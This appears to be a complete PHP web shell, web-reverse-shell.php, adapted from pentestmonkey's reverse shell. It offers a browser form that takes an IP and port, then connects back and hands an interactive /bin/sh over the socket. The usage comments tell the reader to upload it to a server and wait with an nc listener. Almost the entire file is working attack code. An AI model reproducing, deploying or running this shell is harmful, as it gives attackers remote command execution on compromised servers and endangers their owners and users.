📖 File Reader
<?php
// web-reverse-shell.php
// A web interface for the classic PHP reverse shell.
// Usage: Upload to a server, access via browser, enter your IP and port, then submit.
// Make sure you have a listener ready (e.g., nc -lvnp <port>).
// If the form was submitted, run the reverse shell
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ip']) && isset($_POST['port'])) {
$ip = trim($_POST['ip']);
$port = (int)$_POST['port'];
// Validate input (basic)
if (filter_var($ip, FILTER_VALIDATE_IP) && $port > 0 && $port < 65536) {
// Start the reverse shell logic (adapted from pentestmonkey's script)
set_time_limit(0);
$VERSION = "1.0";
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Daemonise if possible (pcntl_fork is rarely available)
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork", $daemon);
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()", $daemon);
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is common and not fatal.", $daemon);
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)", $daemon);
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell", $daemon);
exit(1);
}
// Set non-blocking
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port", $daemon);
// Main loop: forward data between socket and shell pipes
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated", $daemon);
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated", $daemon);
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ", $daemon);
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input", $daemon);
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ", $daemon);
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input", $daemon);
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ", $daemon);
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input", $daemon);
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
exit; // Stop further output after shell ends
} else {
$error = "Invalid IP or port.";
}
}
// Helper function for printing (only if not daemonised)
function printit($string, $daemon) {
if (!$daemon) {
echo "$string\n";
}
}
// Display the form if not already executing the shell
if (!isset($process)) {
?>
<!DOCTYPE html>
<html>
<head>
<title>PHP Reverse Shell Web Interface</title>
<style>
body { font-family: Arial, sans-serif; margin: 50px; }
input { padding: 5px; margin: 5px; }
.error { color: red; }
</style>
</head>
<body>
<h2>PHP Reverse Shell Launcher</h2>
<?php if (isset($error)) echo "<p class='error'>$error</p>"; ?>
<form method="post">
<label>Your IP address:</label>
<input type="text" name="ip" placeholder="e.g., 192.168.1.100" required><br>
<label>Port:</label>
<input type="number" name="port" placeholder="e.g., 4444" required><br>
<input type="submit" value="Connect Back">
</form>
<p><strong>Note:</strong> This script uses <code>proc_open()</code>. If that function is disabled, the shell will not work. Also ensure your listener is ready (e.g., <code>nc -lvnp <port></code>).</p>
</body>
</html>
<?php
}
?>